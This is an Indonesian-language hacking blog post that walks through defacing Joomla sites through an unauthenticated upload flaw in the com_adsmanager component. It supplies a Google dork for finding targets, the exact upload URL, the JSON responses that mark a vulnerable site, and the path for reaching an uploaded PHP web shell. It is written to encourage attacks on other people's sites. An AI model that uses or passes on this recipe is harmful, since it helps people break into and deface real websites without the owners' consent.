Hello, ketemu lagi sama ane , belakangan ini pada nyari 'Exploit Joomla Com_Adsmanager' katanya sih Private, iyaa emang Private, yaudah ane cari cari ehh gatau nya mirip Wordpress Themes Konzept :v tapi berhubung udah ada yang Share duluan yaudah ini ane Share juga :D
Langsung aja cekibrot, Bahan bahannya:
▐ Dork: inurl:/index.php?option=com_adsmanager site: Use Your Brain!
▐ Xampp
▐ Exploit Com_Adsmanager
Instal dulu Xampp nya.
Cari target menggunakan Google Dork, kalo udah ketemu kasih Exploit ini di akhir Url nya, /index.php?option=com_adsmanager&task=upload&tmpl=component , jadi http://localhost/index.php?option=com_adsmanager&task=upload&tmpl=component kalo Vuln responnya {"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_RandomNumber"}EX {"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_16"}
Respon jika shell udah ke upload, {"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "shell.php"}
akses Shell http://localhost/tmp/plupload/shell.php
0 on: "DEFACE DENGAN JOOMLA COM_ADSMANAGER"